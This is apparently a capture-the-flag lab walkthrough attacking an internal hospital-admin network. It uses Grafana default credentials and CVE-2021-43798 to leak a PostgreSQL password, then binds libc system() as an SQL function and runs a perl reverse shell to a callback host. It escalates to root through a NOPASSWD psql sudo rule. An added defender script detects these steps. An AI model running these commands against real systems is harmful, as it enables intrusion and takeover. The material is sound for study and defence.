[2025-04-23 16:02:57] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.12:5432 =>
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.179:8009 =>
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2025-04-23 16:03:02] [INFO] 存活端口数量: 6
[2025-04-23 16:03:02] [INFO] 开始漏洞扫描
[2025-04-23 16:03:02] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2025-04-23 16:03:02] [SUCCESS] 网站标题 http://172.30.54.12:3000 状态码:302 长度:29 标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2025-04-23 16:03:02] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964 标题:医院后台管理平台
[2025-04-23 16:03:03] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909 标题:Grafana

With frp set up, configure a proxy chain through Proxifier

admin/admin logs in

CVE-2021-43798

root@web03:/tmp# ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2024/01/26 10:00:02 Target vulnerable has plugin [alertlist]
2024/01/26 10:00:02 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2024/01/26 10:00:02 There is [0] records in db.
2024/01/26 10:00:02 type:[postgres] name:[PostgreSQL] url:[localhost:5432] user:[postgres] password[Postgres@123] database:[postgres] basic_auth_user:[] basic_auth_password:[]
2024/01/26 10:00:02 All Done, have nice day!

Connect with the recovered credentials

Call the system shared library libc.so.6 to achieve command execution

CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT

Use perl to spawn a reverse shell

select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

postgres@web04:/usr/local/pgsql/data$ sudo -l
sudo -l
Matching Defaults entries for postgres on web04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on web04:
(ALL) NOPASSWD: /usr/local/postgresql/bin/psql
postgres@web04:/usr/local/pgsql/data$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
postgres@web04:/usr/local/pgsql/data$

Privilege escalation through psql

Change the password

ALTER USER root WITH PASSWORD '123456'

Escalate with sudo directly

\!/bin/bash
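Two things on Web04 made this chain work: a superuser database role that could bind libc.so.6's system() as an SQL function, and a sudoers rule that hands the postgres user an interactive program with a built-in shell escape. Added here as a defender-side example (not code from the writeup): analyse_pg_log() scans PostgreSQL statement log lines (log_statement = 'ddl' or 'all') for C-language functions loaded from outside $libdir, and audit_sudoers() flags NOPASSWD rules for programs such as psql that can spawn a shell. The log lines and the sudoers excerpt are constructed samples modelled on the output above.

```python
"""Catch the two PostgreSQL-host weaknesses used above from the defender's side.

Added example, not code from the original writeup. analyse_pg_log() reads
PostgreSQL statement log lines (log_statement = 'ddl' or 'all') and flags
C-language functions bound to a shared library outside $libdir, which is how
libc.so.6's system() became an SQL function; audit_sudoers() flags NOPASSWD
rules for programs with a built-in shell escape, such as psql's \\! command.
Log lines and the sudoers excerpt are constructed samples.
"""
import re

# CREATE [OR REPLACE] FUNCTION name(args) ... AS '<library>', '<symbol>' LANGUAGE [']c[']
_CFUNC = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>[\w.]+)\s*\(.*?\).*?"
    r"AS\s+'(?P<lib>[^']+)'\s*,\s*'(?P<sym>[^']+)'.*?LANGUAGE\s+'?c'?(?!\w)",
    re.IGNORECASE | re.DOTALL,
)

def check_statement(sql: str):
    """Finding text for an untrusted C function definition, else None."""
    m = _CFUNC.search(sql)
    if not m:
        return None
    lib, sym, name = m.group("lib"), m.group("sym"), m.group("name")
    # Extension code installed by the DBA lives under $libdir; anything else is
    # arbitrary native code that runs as the postgres OS user.
    if not lib.startswith("$libdir"):
        return f"untrusted C function {name}(): {lib} -> {sym} loaded from outside $libdir"
    return None

def analyse_pg_log(text: str) -> list:
    """Scan 'LOG:  statement: ...' lines and collect findings."""
    findings = []
    for line in text.splitlines():
        _, _, sql = line.partition("statement: ")
        finding = check_statement(sql) if sql else None
        if finding:
            findings.append(finding)
    return findings

# Programs whose normal interface includes a shell escape (psql: \!, vim: :!).
SHELL_ESCAPE_PROGRAMS = {"psql", "vim", "vim.basic", "vi", "less", "more", "man"}
_RULE = re.compile(r"^(?P<user>\S+)\s+\S+\s*=\s*\((?P<runas>[^)]*)\)\s*"
                   r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def audit_sudoers(text: str) -> list:
    """Flag NOPASSWD rules that grant a shell-escape-capable program."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        m = _RULE.match(line) if line and not line.startswith("#") else None
        if not m or "NOPASSWD" not in m.group("tags").upper():
            continue
        for cmd in m.group("cmds").split(","):
            prog = cmd.strip().split()[0].rsplit("/", 1)[-1]
            if prog in SHELL_ESCAPE_PROGRAMS:
                findings.append(f"{m.group('user')} runs {cmd.strip()} as ({m.group('runas')}) "
                                f"with NOPASSWD; {prog} can spawn a shell")
    return findings

# Constructed samples: a benign DDL line, the statement from the writeup, and a
# legitimate extension function; then a sudoers excerpt mirroring 'sudo -l' above.
SAMPLE_PG_LOG = """\
2025-04-23 17:10:01 UTC [1234] postgres@postgres LOG:  statement: CREATE TABLE patients (id int)
2025-04-23 17:10:05 UTC [1234] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT
2025-04-23 17:10:09 UTC [1234] postgres@postgres LOG:  statement: CREATE FUNCTION pg_stat_statements_reset() RETURNS void AS '$libdir/pg_stat_statements', 'pg_stat_statements_reset' LANGUAGE C
"""
SAMPLE_SUDOERS = """\
root     ALL=(ALL:ALL) ALL
postgres ALL=(ALL) NOPASSWD: /usr/local/postgresql/bin/psql
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
"""

if __name__ == "__main__":
    print(*analyse_pg_log(SAMPLE_PG_LOG), *audit_sudoers(SAMPLE_SUDOERS), sep="\n")
```

Only a superuser can create untrusted C-language functions, so the application's database role not being a superuser removes the first step entirely; the sudoers rule is fixed by dropping it or by granting a wrapper script that runs a fixed, non-interactive psql command.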

Got flag4
